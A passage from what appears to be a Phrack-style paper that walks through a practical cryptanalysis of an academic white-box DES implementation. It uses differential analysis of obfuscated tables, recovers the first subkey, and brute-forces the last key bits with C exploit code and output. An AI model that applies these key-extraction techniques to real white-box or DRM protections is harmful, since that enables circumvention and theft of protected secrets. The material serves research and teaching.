|
|
[...]
|
|
OUT[11] (high) is composed of:
|
|
-> bit 7
|
|
-> bit 15
|
|
-> bit 23
|
|
-> bit 31
|
|
OUT[11] (low) is composed of:
|
|
-> bit 14
|
|
-> bit 22
|
|
-> bit 46
|
|
-> bit 54
|
|
[+] Total nbr of bits involved = 96
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
So the analysis of the 8 first LUT reveals that each output (OUT[i])
|
|
nibble is linked to exactly 4 input bits. So the 8 first iBox_i are no more
|
|
than an obfuscated linear mapping.
|
|
|
|
A good idea is to focus more specifically on the input bits frequency:
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./entropy
|
|
[...]
|
|
[+] Nbr of times a bit is used
|
|
[b_00] 2 [b_01] 1 [b_02] 2 [b_03] 1 [b_04] 2 [b_05] 1 [b_06] 2 [b_07] 1
|
|
[b_08] 2 [b_09] 1 [b_10] 2 [b_11] 1 [b_12] 2 [b_13] 1 [b_14] 2 [b_15] 1
|
|
[b_16] 2 [b_17] 1 [b_18] 2 [b_19] 1 [b_20] 2 [b_21] 1 [b_22] 2 [b_23] 1
|
|
[b_24] 2 [b_25] 1 [b_26] 2 [b_27] 1 [b_28] 2 [b_29] 1 [b_30] 2 [b_31] 1
|
|
[b_32] 2 [b_33] 1 [b_34] 2 [b_35] 1 [b_36] 2 [b_37] 1 [b_38] 2 [b_39] 1
|
|
[b_40] 2 [b_41] 1 [b_42] 2 [b_43] 1 [b_44] 2 [b_45] 1 [b_46] 2 [b_47] 1
|
|
[b_48] 2 [b_49] 1 [b_50] 2 [b_51] 1 [b_52] 2 [b_53] 1 [b_54] 2 [b_55] 1
|
|
[b_56] 2 [b_57] 1 [b_58] 2 [b_59] 1 [b_60] 2 [b_61] 1 [b_62] 2 [b_63] 1
|
|
$
|
|
---------------------------------------------------------------------------
|
|
|
|
The even bits are used exactly twice while odd ones are only used once
|
|
(here odd and even both refer to the position). Or you could say that even
|
|
bits are duplicated in the internal state built after this step.
|
|
|
|
Anybody familiar with the DES knows that the IP(X) function of the DES
|
|
gives the internal state L || R where:
|
|
|
|
- L is an array composed of the odd bits of X
|
|
- R is an array composed of the even bits of X
|
|
|
|
In an academic WB DES implementation, building the 96 bits state is
|
|
performed using the duplication of even bits (R). This is because these
|
|
bits are necessary as both input of the E-box and output of the DES round
|
|
function (see my previous description of DES). So we have an obvious match
|
|
and it's a clear indication that there is no external encoding applied to
|
|
the input (and as a consequence probably none applied to the output as
|
|
well). More precisely there could still be a bit permutation on both L & R
|
|
bits but it sounds like a silly hypothesis so let's forget about that.
|
|
What would be the point?
|
|
|
|
---
|
|
|
|
Now let's continue with the differential analysis of the full wb_init().
|
|
This step is much more intuitive. Think about it: if you want to discover
|
|
the nibbles of stage0 (the output of wb_init) influenced by a specific
|
|
input bit then apply wb_init() to two inputs whose only difference is this
|
|
bit. Then calculate the XOR of both results and the non null nibbles are
|
|
the ones which are affected. This was greatly inspired by [R09].
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./entropy
|
|
[...]
|
|
[+] Differential cryptanalysis on wb_init()
|
|
-> b_00 :: 00 04 20 00 00 00 00 00 00 00 00 00
|
|
-> b_01 :: 00 00 00 40 00 00 00 00 00 00 00 00
|
|
-> b_02 :: 00 00 00 09 d0 00 00 00 00 00 00 00
|
|
-> b_03 :: 00 00 00 00 00 00 00 90 00 00 00 00
|
|
-> b_04 :: 00 00 00 00 00 0e 60 00 00 00 00 00
|
|
-> b_05 :: 00 00 00 00 00 00 00 00 00 50 00 00
|
|
-> b_06 :: 80 00 00 00 00 00 00 05 00 00 00 00
|
|
-> b_07 :: 00 00 00 00 00 00 00 00 00 00 00 b0
|
|
-> b_08 :: 00 07 00 00 00 00 00 00 01 00 00 00
|
|
-> b_09 :: 00 00 00 f0 00 00 00 00 00 00 00 00
|
|
-> b_10 :: 00 00 00 06 00 00 00 00 00 03 00 00
|
|
[...]
|
|
---------------------------------------------------------------------------
|
|
|
|
So for even bits there are 2 nibbles affected and only one for odd
|
|
bits. Not only does it confirm our previous hypothesis but it also reveals
|
|
the position (the index in the nibble array) of the bits in the WB internal
|
|
state (up to 1/2 probability for even bits). This is particularly
|
|
interesting when it comes to locate S-box for example ;-)
|
|
|
|
|
|
Analyzing the first wb_round()
|
|
------------------------------
|
|
|
|
|
|
To analyze this function, one clever trick is to make use of the odd
|
|
bits (L0) and perform a differential analysis.
|
|
|
|
Natively, the DES satisfies the following system of equations:
|
|
|
|
L1 = R0
|
|
R1 = L0 [+] f(R0,K0)
|
|
|
|
With
|
|
L0 || R0 being the result of IP(plaintext)
|
|
K0 being the first subkey
|
|
|
|
Let's now consider two plaintexts (A and B). The first one is composed
|
|
of bits all set to 0 (L0_A || R0_A) whereas the second one ((L0_B || R0_B)
|
|
has a weight of 1 and more specifically, its sole bit set to 1 is in L0.
|
|
|
|
Remark: While there is only one A, there are obviously 32 possible B.
|
|
We can thus write thanks to the previous equations:
|
|
|
|
L1_A = R0_A = 0
|
|
R1_A = L0_A [+] f(R0_A,K0) = f(0,K0)
|
|
|
|
And
|
|
|
|
L1_B = R0_B = 0
|
|
R1_B = L0_B [+] f(R0_B,K0) = L0_B [+] f(0,K0)
|
|
|
|
(Again please excuse the lazy notation)
|
|
|
|
This finally gives us:
|
|
|
|
DELTA(L1||R1)(A,B) = ( L1_A [+] L1_B || R1_A [+] R1_B )
|
|
= ( 0 [+] 0 || f(0,K0) [+] L0_B [+] f(0,K0) )
|
|
= ( 0 || L0_B )
|
|
|
|
We know that L0_B's weight is 1 so in a native DES the modification of
|
|
one bit in L0 induces the modification of a unique bit in the output of the
|
|
DES round function. In an obfuscated context, this means that only one
|
|
output nibble is modified and calculating DELTA (the result of the so
|
|
called differential analysis if you prefer) is merely a trick to identify
|
|
it easily.
|
|
|
|
Now that you've grasped the main idea, let's work on the real WB. Again
|
|
consider plaintexts A and B which give (L0_A || R0_A) and (L0_B || R0_B)
|
|
after IP().
|
|
|
|
Because wb_round() includes the E-box and produces a 96 bits output
|
|
state, we now have to consider an additional transformation:
|
|
|
|
X (64b) ---> [ wb_init + first wb_round ] ----> Y (96b)
|
|
|
|
Here Y is the output of wb_round. Following the design in academic
|
|
publications we can write:
|
|
|
|
Y = RP ( L1 || X1 || r1 ) (RP = Random bit Permutation used to hide
|
|
the position of bits in the
|
|
obfuscated output.)
|
|
|
|
With:
|
|
- L1 being R0 (from DES round equation)
|
|
- X1 being the result of the E-box applied to R1
|
|
- r1 being the complementary bits such as the set of X1 and r1 is
|
|
exactly twice R1
|
|
|
|
Now let's apply again the differential analysis. It's important to
|
|
remark that RP() and E() are both linear operations as this simplifies
|
|
things. Indeed it's well known that:
|
|
|
|
LinearFunc(x [+] y) = LinearFunc(x) [+] LinearFunc(y)
|
|
|
|
Putting everything together this gives us:
|
|
|
|
DELTA(Y)(a,b) = RP(Y_A) [+] RP(Y_B)
|
|
= RP(Y_A [+] Y_B)
|
|
= RP(L1_A [+] L1_B || X1_A [+] X1_B
|
|
|| r1_A [+] r1_B)
|
|
= RP(0 [+] 0 || E(f(0,K0)) [+] E(L0_B [+] f(0,K0))
|
|
|| r1_a [+] r1_b)
|
|
= RP(0 || E(f(0,K0) [+] L0_B [+] f(0,K0)z)
|
|
|| r1_A [+] r1_B)
|
|
= RP(0 || E(L0_B) || r1_A [+] r1_B)
|
|
|
|
If the bit set in L0 is a middle bit then:
|
|
- Weight(E(L0_B)) = 1 and Weight(r1_A [+] r1_B)) = 1
|
|
If the bit set in L0 isn't a middle bit then:
|
|
- Weight(E(L0_B)) = 2 and Weight(r1_A [+] r1_B)) = 0
|
|
|
|
In both cases, Weight(RP(0 || E(L0_B) || r1_A [+] r1_B)) = 2, RP having
|
|
no effect on the weight since it only permutes bits. This means that 1 bit
|
|
modification should have a visible impact on 'at most' 2 nibbles. 'at most'
|
|
and not 'exactly' because with the effect of RP() the two bits could be
|
|
located in the same nibble.
|
|
|
|
Let's see if we are right:
|
|
|
|
---------------------------------------------------------------------------
|
|
b_01 :: 00 05 d0 00 00 00 00 00 00 00 00 00 <-- 2 modified nibbles
|
|
b_03 :: 00 00 00 03 60 00 00 00 00 00 00 00 <-- 2 modified nibbles
|
|
b_05 :: 00 00 00 00 00 04 e0 00 00 00 00 00 <-- 2 modified nibbles
|
|
b_07 :: 90 00 00 00 00 00 00 08 00 00 00 00 ...
|
|
b_09 :: 00 0b 00 00 00 00 00 00 05 00 00 00
|
|
b_11 :: 00 00 00 0f 00 00 00 00 00 08 00 00
|
|
b_13 :: 00 00 00 00 00 0d 00 00 00 00 0f 00
|
|
b_15 :: 00 00 00 00 00 00 00 0f 00 00 00 06
|
|
b_17 :: 00 04 00 00 00 00 00 00 0c 00 00 00
|
|
b_19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
|
|
b_21 :: 00 00 00 00 00 08 00 00 00 00 06 00
|
|
b_23 :: 00 00 00 00 00 00 00 0d 00 00 00 08
|
|
b_25 :: 08 d0 00 00 00 00 00 00 00 00 00 00
|
|
b_27 :: 00 00 04 20 00 00 00 00 00 00 00 00
|
|
b_29 :: 00 00 00 00 05 80 00 00 00 00 00 00
|
|
b_31 :: 00 00 00 00 00 00 04 20 00 00 00 00
|
|
b_33 :: 02 70 00 00 00 00 00 00 00 00 00 00
|
|
b_35 :: 00 00 0c f0 00 00 00 00 00 00 00 00
|
|
b_37 :: 00 00 00 00 0d b0 00 00 00 00 00 00
|
|
b_39 :: 00 00 00 00 00 00 0f a0 00 00 00 00
|
|
b_41 :: 0c 00 00 00 00 00 00 00 0f 00 00 00
|
|
b_43 :: 00 00 0d 00 00 00 00 00 00 02 00 00
|
|
b_45 :: 00 00 00 00 09 00 00 00 00 00 05 00
|
|
b_47 :: 00 00 00 00 00 00 03 00 00 00 00 03
|
|
b_49 :: 0f 00 00 00 00 00 00 00 0d 00 00 00
|
|
b_51 :: 00 00 06 00 00 00 00 00 00 03 00 00
|
|
b_53 :: 00 00 00 00 0b 00 00 00 00 00 0c 00
|
|
b_55 :: 00 00 00 00 00 00 02 00 00 00 00 01
|
|
b_57 :: b0 00 00 00 00 00 00 0c 00 00 00 00
|
|
b_59 :: 00 03 60 00 00 00 00 00 00 00 00 00
|
|
b_61 :: 00 00 00 0e 40 00 00 00 00 00 00 00
|
|
b_63 :: 00 00 00 00 00 0b f0 00 00 00 00 00
|
|
---------------------------------------------------------------------------
|
|
|
|
And that's exactly what we were expecting :) Well to be honest, I first
|
|
observed the result of the differential analysis, then remarked a 'strange'
|
|
behavior related to the odd bits and finally figured out why using maths ;)
|
|
|
|
One cool thing with this situation is that we can easily leak the
|
|
position of the specific S-Boxes inside the T-Boxes. First let's compare
|
|
the differential analysis of even bits 28,36,52,60 and of odd bit 1:
|
|
|
|
---------------------------------------------------------------------------
|
|
b_01 :: 00 05 d0 00 00 00 00 00 00 00 00 00
|
|
b_28 :: 0d 75 dd 00 00 00 04 20 0f d2 00 00
|
|
b_36 :: 0c 05 d0 00 09 00 04 20 cf 00 05 00
|
|
b_52 :: 00 05 d0 09 00 00 00 00 90 0f 00 00
|
|
b_60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
|
|
---------------------------------------------------------------------------
|
|
|
|
Obviously setting these even bits one by one induces the same
|
|
modification (amongst others) as setting the odd bit 1 (nibbles 01L (0x5)
|
|
and 02H (0xd)) so there must be some kind of mathematical link between them
|
|
because the other bits do not have such property.
|
|
|
|
|
|
Playing with Sbox
|
|
------------------
|
|
|
|
|
|
The reason behind this behavior is very simple to explain. But first,
|
|
let's take back the example of plaintext 'A' (null vector):
|
|
|
|
We know that:
|
|
|
|
R1_A = L0_a [+] P(S1[0 [+] k0] || S2[0 [+] k1] || ... || S8[0 [+] k7])
|
|
R1_A = 0 [+] P(S1[k0] || S2[k0] || ... || S8[k7])
|
|
R1_A = P( S1[k0] || S2[k1] || ... || S8[k7] )
|
|
|
|
Where:
|
|
The ki being 6 bits vectors (0 <= i < 8)
|
|
K0 = k0 || k1 || k2 ... || k7
|
|
|
|
Thus in the case of plaintext 0 (A), R1_A is the permutation of the
|
|
Sbox output whose inputs are the bits of the first subkey.
|
|
|
|
Now let us focus on 1 of the 4 bits generated by an Sbox S (which could
|
|
be any of the 8). We do not know its value (b) but when the P-box is
|
|
applied it will be located in a particular nibble as illustrated below:
|
|
|
|
|
|
R1_A = f(R0,K0) = ???? ?b?? ???? ???? ???? ???? ???? ????
|
|
|
|
^
|
|
|__ The bit
|
|
|
|
<------------------------------------->
|
|
(4bits x 8) = 32 bits state
|
|
|
|
|
|
Because a WB DES implementation is working with a duplicated Rx this
|
|
will give us the following internal state:
|
|
|
|
... ??b? ???? ???? ???b ...
|
|
|
|
^ ^
|
|
| |
|
|
-------------------- b is duplicated
|
|
|
|
<------------------------->
|
|
96 bits state
|
|
|
|
|
|
Now following what was explained previously with odd bits, out of the
|
|
32 possible B, one of them will affect b when L0_B is XORed with f(0,K0)
|
|
|
|
So considering a 96 bits internal state inside the WB, this gives us:
|
|
|
|
... ??a? ???? ???? ???a ...
|
|
|
|
With:
|
|
a = b [+] 1
|
|
|
|
As a result, the differential between A and B would be:
|
|
|
|
... ??b? ???? ???? ???b ... (from A)
|
|
|
|
[+]
|
|
|
|
... ??a? ???? ???? ???a ... (from B)
|
|
|
|
=
|
|
|
|
... ??1? ???? ???? ???1 ... ( because a [+] b
|
|
= a [+] a [+] 1
|
|
= 1 )
|
|
|
|
From now on, we will call this differential our 'witness' and by
|
|
extension, the two nibbles where b=1 the 2 witness nibbles.
|
|
|
|
|
|
Playing with the witness
|
|
------------------------
|
|
|
|
|
|
Now imagine that we're using another plaintext (X) with weight 1 and
|
|
whose weight is in one of the 6 possible bits influencing Sbox S. There are
|
|
two possible situations:
|
|
|
|
- S still produces b
|
|
- S now produces b+1
|
|
|
|
If we perform a differential analysis between X and A (null vector)
|
|
this gives us:
|
|
|
|
case 1:
|
|
=======
|
|
|
|
... ??b? ???? ???? ???b ... (from A)
|
|
|
|
[+]
|
|
|
|
... ??b? ???? ???? ???b ... (from X)
|
|
|
|
=
|
|
|
|
... ??0? ???? ???? ???0 ... <-- useless output
|
|
|
|
case 2:
|
|
=======
|
|
|
|
... ??b? ???? ???? ???b ... (from A)
|
|
|
|
[+]
|
|
|
|
... ??a? ???? ???? ???a ... (from X)
|
|
|
|
=
|
|
|
|
... ??1? ???? ???? ???1 ... <-- witness vector :)))
|
|
|
|
|
|
So case 2 is perfect because it gives us a distinguisher. We can test
|
|
all 32 possible X (each of them having a different even bit set) and
|
|
observe the ones which produce the witness vector associated with b.
|
|
|
|
This is exactly what we did implicitly when we discovered the link
|
|
between bits 28, 36, 52 and 60. Or if you're lost let's say that we've just
|
|
discovered something huge: the bits 28, 36, 52 and 60 are the input of the
|
|
same Sbox and bit 1 is one of the output of this Sbox. At this point the
|
|
protection took a heavy hit.
|
|
|
|
Remark: The first subkey is modifying the input sent to the Sbox. As a
|
|
consequence the relation previously found is "key dependent". This will be
|
|
of importance later, keep reading!
|
|
|
|
|
|
Going further
|
|
-------------
|
|
|
|
|
|
Let's think. At this point and thanks to our analysis of wb_init()
|
|
we're almost sure that there is no external encoding applied to the input.
|
|
So there should be a match between our practical results and the
|
|
theoretical relations in the original DES algorithm. To verify my theory, I
|
|
wrote a little script to compute the positions of the bits involved with
|
|
each Sbox:
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./bitmapping.py
|
|
[6, 56, 48, 40, 32, 24] <-- Sbox 1
|
|
[32, 24, 16, 8, 0, 58] <-- Sbox 2
|
|
[0, 58, 50, 42, 34, 26]
|
|
[34, 26, 18, 10, 2, 60]
|
|
[2, 60, 52, 44, 36, 28] <-- Sbox 5
|
|
[36, 28, 20, 12, 4, 62]
|
|
[4, 62, 54, 46, 38, 30]
|
|
[38, 30, 22, 14, 6, 56] <-- Sbox 8
|
|
---------------------------------------------------------------------------
|
|
|
|
Oh interesting so Sbox 5 seems to match with our practical result.
|
|
Going deeper, we need to check if bit 01 is involved with this Sbox. Again
|
|
I wrote another script to compute the position of odd bits involved with
|
|
the Sbox in the original DES and this gives us:
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./sbox.py | grep 'SBOX 5'
|
|
bit 41 XORED with bit 00 of SBOX 5 (19)
|
|
bit 01 XORED with bit 03 of SBOX 5 (16)
|
|
bit 19 XORED with bit 02 of SBOX 5 (17)
|
|
bit 63 XORED with bit 01 of SBOX 5 (18)
|
|
---------------------------------------------------------------------------
|
|
|
|
So bit 01 is indeed involved. However let's try to be careful. In
|
|
cryptanalysis it's easy to be fooled, so let's make extra checks. For
|
|
example can we link a subset of even bits {2, 28, 36, 44, 52, 60} with bit
|
|
19 of the same Sbox?
|
|
|
|
---------------------------------------------------------------------------
|
|
19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
|
|
2 :: 0c 00 06 00 00 0b f2 60 0f 03 00 01
|
|
28 :: 0d 75 dd 00 00 00 04 20 0f d2 00 00
|
|
36 :: 0c 05 d0 00 09 00 04 20 cf 00 05 00
|
|
44 :: 00 00 00 09 00 0b f0 00 20 0f 00 00
|
|
52 :: 00 05 d0 09 00 00 00 00 90 0f 00 00
|
|
60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
|
|
---------------------------------------------------------------------------
|
|
|
|
Bit 19 is linked to bit 44 and 52 => YES. At this point, we should
|
|
check automatically that the bit relations are satisfied for all the Sbox
|
|
but it's tedious. That's the problem :-P Because I was lazy, I manually
|
|
checked all the relations. Fortunately with the help of scripts, this only
|
|
took me a couple of minutes and it was a 100% match. Again, this proves
|
|
nothing but as I said earlier, we're working with guesses.
|
|
|
|
|
|
Towards a perfect understanding of differential analysis
|
|
--------------------------------------------------------
|
|
|
|
|
|
Didn't you notice something particular with bit 02, 28 and 60? Well the
|
|
'impacted' nibbles were neither 0 nor a witness nibble. For example
|
|
consider bit 60:
|
|
|
|
---------------------------------------------------------------------------
|
|
19 :: 00 00 00 09 00 00 00 00 00 0f 00 00
|
|
60 :: 0c 05 d6 09 00 00 02 00 3f 0d 00 01
|
|
---------------------------------------------------------------------------
|
|
|
|
The first impacted nibble '0x9' is a good one (witness nibble) but the
|
|
second one is neither '0x0' nor '0xf' (witness). How is that possible?
|
|
|
|
Well the answer lies in both:
|
|
- the (non)-middle bits
|
|
- the P-box
|
|
|
|
Indeed if you consider the bits sent to Sbox 5, you have to know that:
|
|
- bits 02 and 60 are sent to both Sbox 4 & 5
|
|
- bits 52 and 44 are sent to Sbox 5
|
|
- bits 36 and 28 are sent to both Sbox 5 & 6
|
|
|
|
So when 1 non-middle bit is set, this will impact the output of 2 Sbox
|
|
and we're unlucky, the P-box will have the unfortunate effect of setting
|
|
them in the same nibble, hence the difference observed.
|
|
|
|
|
|
----[ 6.3 - Recovering the first subkey
|
|
|
|
|
|
If the relations observed are 'key dependent', considering the fact
|
|
that the S-Boxes are known (which means unmodified otherwise this would be
|
|
cheating :p) then isn't this an indirect leak on the key itself that could
|
|
be transformed in a key recovery? Oh yes it is :-)
|
|
|
|
|
|
First cryptanalysis
|
|
-------------------
|
|
|
|
|
|
The main idea is really simple: we know that for a given subkey,
|
|
several unitary vectors (plaintexts of weight 1) will produce the same
|
|
output bit.
|
|
|
|
Let's take again the previous case. We have:
|
|
|
|
|
|
.------.------.------.-----.-----.------.
|
|
| b_02 | b_60 | b_52 |b_44 |b_36 | b_28 |
|
|
'------'------'------'-----'-----'------'
|
|
.....
|
|
. + .
|
|
.....
|
|
.------.------.------.-----.-----.------.
|
|
| k24 | k25 | k26 | k27 | k28 | k29 |
|
|
'------'------'------'-----'-----'------'
|
|
|
|
|
v
|
|
*********************
|
|
* Sbox 5 *
|
|
*********************
|
|
|
|
|
v
|
|
.------.------.------.-----.
|
|
| y0 | y1 | y2 | y3 |
|
|
'------'------'------'-----'
|
|
|
|
|
|
Let us consider bit 01. We know that it will be XORed to y2 so from the
|
|
differential analysis we can derive the set of relations:
|
|
|
|
[ k24 [+] 0, k25 [+] 1, k26 [+] 0, k27 [+] 0, k28 [+] 0, k29 [+] 0 ] => b
|
|
[ k24 [+] 0, k25 [+] 0, k26 [+] 1, k27 [+] 0, k28 [+] 0, k29 [+] 0 ] => b
|
|
[ k24 [+] 0, k25 [+] 0, k26 [+] 0, k27 [+] 0, k28 [+] 1, k29 [+] 0 ] => b
|
|
[ k24 [+] 0, k25 [+] 0, k26 [+] 0, k27 [+] 0, k28 [+] 0, k29 [+] 1 ] => b
|
|
|
|
So amongst all possible sets {k24,k25,k26,k27,k28,k29}, only a few of
|
|
them (including the one from the real subkey) will satisfy the relations.
|
|
Testing all possible sets (there are 2^6 = 64 of them) will give us 2 lists
|
|
because we do not know if b=1 or b=0 so we have to consider both cases.
|
|
|
|
Applying this technique to both y0, y1, y2 and y3 will allow to filter
|
|
efficiently the number of possible candidates as we will only consider
|
|
those present in all lists. The success of this cryptanalysis is highly
|
|
dependent on the number of relations that we will be able to create for a
|
|
particular S-Box. Practically speaking, this is sufficient to recover the
|
|
first subkey as the complexity should be far below 2^48. Should be? Yes I
|
|
didn't test it... I found even better.
|
|
|
|
|
|
Immediate subkey recovery
|
|
-------------------------
|
|
|
|
|
|
As I said above, our success is dependent of the number of equations so
|
|
improving the cryptanalysis can be done by finding ways to increase this
|
|
number. There are two obvious ways to do that:
|
|
|
|
- There may exist combinations of input bits other than unitary
|
|
vectors (weight > 1) which can produce the witness nibbles in a
|
|
differential analysis.
|
|
- If the impacted nibbles are both 0x0 then this gives us a new
|
|
relation where expected output bit is b [+] 1
|
|
|
|
Practically speaking this gives us the following result for Sbox5 and
|
|
bit 01:
|
|
|
|
---------------------------------------------------------------------------
|
|
$ ./exploit
|
|
[...]
|
|
{ 1 0 0 0 0 0 } = { 1 } <-- dumping relations for S5 & bit 01
|
|
{ 0 1 0 0 0 0 } = { 0 }
|
|
{ 1 1 0 0 0 0 } = { 0 }
|
|
{ 0 0 1 0 0 0 } = { 0 }
|
|
{ 1 0 1 0 0 0 } = { 1 }
|
|
{ 0 1 1 0 0 0 } = { 1 }
|
|
{ 1 1 1 0 0 0 } = { 1 }
|
|
{ 0 0 0 1 0 0 } = { 1 }
|
|
{ 1 0 0 1 0 0 } = { 0 }
|
|
{ 0 1 0 1 0 0 } = { 0 }
|
|
{ 1 1 0 1 0 0 } = { 1 }
|
|
{ 0 0 1 1 0 0 } = { 1 }
|
|
{ 1 0 1 1 0 0 } = { 0 }
|
|
{ 0 1 1 1 0 0 } = { 1 }
|
|
{ 1 1 1 1 0 0 } = { 0 }
|
|
{ 0 0 0 0 1 0 } = { 0 }
|
|
{ 1 0 0 0 1 0 } = { 1 }
|
|
{ 0 1 0 0 1 0 } = { 0 }
|
|
{ 1 1 0 0 1 0 } = { 0 }
|
|
{ 0 0 1 0 1 0 } = { 1 }
|
|
{ 1 0 1 0 1 0 } = { 0 }
|
|
{ 0 1 1 0 1 0 } = { 0 }
|
|
{ 1 1 1 0 1 0 } = { 1 }
|
|
{ 0 0 0 1 1 0 } = { 0 }
|
|
{ 1 0 0 1 1 0 } = { 0 }
|
|
{ 0 1 0 1 1 0 } = { 1 }
|
|
{ 1 1 0 1 1 0 } = { 0 }
|
|
{ 0 1 0 1 0 1 } = { 1 }
|
|
|
|
[...]
|
|
|
|
[ key candidate is 31]
|
|
---------------------------------------------------------------------------
|
|
|
|
The cryptanalysts have the habit to always evaluate the complexity of
|
|
their attacks but in this case let's say that it's useless. Only one subkey
|
|
appeared to be valid out of the 2^48 possible ones.
|
|
|
|
|
|
----[ 6.4 - Recovering the original key
|
|
|
|
|
|
Now that we've retrieved the first subkey, our goal is almost reached.
|
|
So how do we retrieve the secret key? Well DES subkeys can be seen as
|
|
truncated permutations of the original key. This means that we now have 48
|
|
out of the 56 bits of the original key.
|
|
|
|
I could explain the key scheduling mechanism of the DES, but it's
|
|
useless as the only important thing is to be able to reverse the
|
|
permutation. This is done easily thanks to the following python
|
|
manipulation applied to the sKMap1 array, itself being shamelessly ripped
|
|
from [13]:
|
|
|
|
---------------------------------------------------------------------------
|
|
>>> InvsKMap1 = [ -1 for i in xrange(64) ]
|
|
>>> for x in xrange(len(InvsKMap1)):
|
|
... if 7-x%8 == 0:
|
|
... InvsKMap1[x] = -2
|
|
...
|
|
>>> for x in xrange(64):
|
|
... if x in sKMap1:
|
|
... InvsKMap1[x] = sKMap1.index(x)
|
|
...
|
|
>>> InvsKMap1
|
|
[19, 8, 12, 29, 32, -1, -1, -2, 9, 0, -1, -1, 44, 43, 40, -2, 5, 22, 10,
|
|
41, 37, 24, 34, -2, 15, 14, 21, 25, 35, 31, 47, -2, 6, 2, 13, 20, 28, 38,
|
|
26, -2, 23, 11, -1, 16, 42, -1, 30, -2, 4, -1, 1, -1, 33, 27, 46, -2, 7,
|
|
17, 18, 3, 36, 45, 39, -2]
|
|
>>>
|
|
---------------------------------------------------------------------------
|
|
|
|
Here is the resulting array:
|
|
|
|
char InvsKMap1[64] = {
|
|
19, 8, 12, 29, 32, -1, -1, -2,
|
|
9, 0, -1, -1, 44, 43, 40, -2,
|
|
5, 22, 10, 41, 37, 24, 34, -2,
|
|
15, 14, 21, 25, 35, 31, 47, -2,
|
|
6, 2, 13, 20, 28, 38, 26, -2,
|
|
23, 11, -1, 16, 42, -1, 30, -2,
|
|
4, -1, 1, -1, 33, 27, 46, -2,
|
|
7, 17, 18, 3, 36, 45, 39, -2
|
|
};
|
|
|
|
My exploit uses this array to build an original key out of both the
|
|
subkey bits and an 8 bits vector. '-1' is set for a bit position where the
|
|
value has to be guessed. There are 8 such positions, and for each of them,
|
|
a bit is taken from the 8 bits vector. '-2' means that the bit can be
|
|
anything. Indeed the most significant bits (the so-called parity bits) of
|
|
the 8 bytes key array are never taken into account (hence the well known
|
|
8 x 7 = 56 bits keylength).
|
|
|
|
Now the only remaining thing to do is to guess these 8 missing bits.
|
|
Obviously for each guess you will generate an original key 'K' and test it
|
|
against a known couple of input/output generated by the white-box. The
|
|
whole operation was implemented below:
|
|
|
|
---------------------------------------------------------------------------
|
|
void RebuildKeyFromSk1(uchar *dst, uchar *src, uchar lastbits)
|
|
{
|
|
int i,j;
|
|
char *plastbits = (char *)&lastbits;
|
|
|
|
memset(dst, 0, DES_KEY_LENGTH);
|
|
for(i=0,j=0; i<64; i++)
|
|
{
|
|
// Parity bit
|
|
if(InvsKMap1[i] == -2)
|
|
continue;
|
|
|
|
// Bit is guessed
|
|
else if(InvsKMap1[i] == -1)
|
|
{
|
|
if(GETBIT(plastbits,j))
|
|
SETBIT(dst,i);
|
|
j++;
|
|
}
|
|
// Bit is already known
|
|
else
|
|
{
|
|
if(GETBIT(src, InvsKMap1[i]))
|
|
SETBIT(dst,i);
|
|
}
|
|
}
|
|
return;
|
|
}
|
|
|
|
[...]
|
|
|
|
const_DES_cblock in = "\x12\x32\xe7\xd3\x0f\xf1\x29\xb3";
|
|
const_DES_cblock expected = "\xa1\x6b\xd2\xeb\xbf\xe1\xd1\xc2";
|
|
DES_cblock key;
|
|
DES_cblock out;
|
|
DES_key_schedule ks;
|
|
|
|
for(missing_bits=0; missing_bits<256; missing_bits++)
|
|
{
|
|
RebuildKeyFromSk1(key, sk, missing_bits);
|
|
memset(out, 0, sizeof out);
|
|
DES_set_key(&key, &ks);
|
|
DES_ecb_encrypt(&in, &out, &ks, DES_ENCRYPT);
|
|
|
|
if(!memcmp(out,expected,DES_BLOCK_LENGTH))
|
|
{
|
|
printf("[+] Key was found!\n");
|
|
[...]
|
|
}
|
|
}
|
|
---------------------------------------------------------------------------
|
|
|
|
The whole cryptanalysis of the white-box is very effective and allows
|
|
us to retrieve a key in a few ms. More precisely it retrieves _1_ of the
|
|
256 possible 8 bytes key ;)
|
|
|
|
---------------------------------------------------------------------------
|
|
$ tar xfz p68-exploit.tgz; cd p68-exploit
|
|
$ wget http://homes.esat.kuleuven.be/~bwyseur/research/wbDES
|
|
$ md5sum wbDES
|
|
b9c4c69b08e12f577c91ec186edc5355 wbDES # you can never be sure ;-)
|
|
$ for f in scripts/*.gdb; do gdb -x $f; done > /dev/null # is quite long
|
|
$ make
|
|
gcc -c wb_init.c -O3 -Wall
|
|
gcc -c wb_round.c -O3 -Wall
|
|
gcc -c wb_final.c -O3 -Wall
|
|
gcc exploit.c *.o -O3 -Wall -o exploit -lm -lcrypto
|
|
gcc wb_main.c *.o -O3 -Wall -o wbdes.try
|
|
gcc entropy.c -o entropy -lm
|
|
$ ./exploit
|
|
|
|
[+] Number of possible candidates = 256
|
|
-> Required computation is 2^(8) * DES()
|
|
|
|
[+] Key was found!
|
|
-> Missing bits: 0x3d
|
|
-> Key: '02424626'
|
|
|
|
$
|
|
---------------------------------------------------------------------------
|
|
|
|
And that's it! So the key was bf-able after all ;>
|
|
|
|
|
|
--[ 7 - Conclusion
|
|
|
|
|
|
Nowadays there are a lot of white-box protections in the wild (DRM but
|
|
not only) using either academic designs or their improvements. Each of them
|
|
is an interesting challenge which is why you may want to face it one day.
|
|
This paper is not ground breaking nor even relevant for the average
|
|
cryptographer, the cryptanalysis of the naked DES being covered in many
|
|
papers including [R16]. I wrote it however with the hope that it would give
|
|
you an overview of what practical white-box cracking could be. I hope you
|
|
enjoyed it :)
|
|
|
|
Feel free to contact me for any question related to this paper using
|
|
the mail alias provided in the title of the paper.
|
|
|
|
|
|
--[ 8 - Gr33tz
|
|
|
|
|
|
Many (randomly ordered) thanks to:
|
|
|
|
- the #f4lst4ff crypt0/b33r team for introducing me to the concept of
|
|
white-box a few years ago.
|
|
- Jb & Brecht for their implementations which gave me a lot of fun :)
|
|
- X, Y, Z who will remain anonymous but nonetheless helped me to
|
|
improve _significantly_ the paper. If you managed to understand a few
|
|
things out of this "blabla" then you must thank them (and especially
|
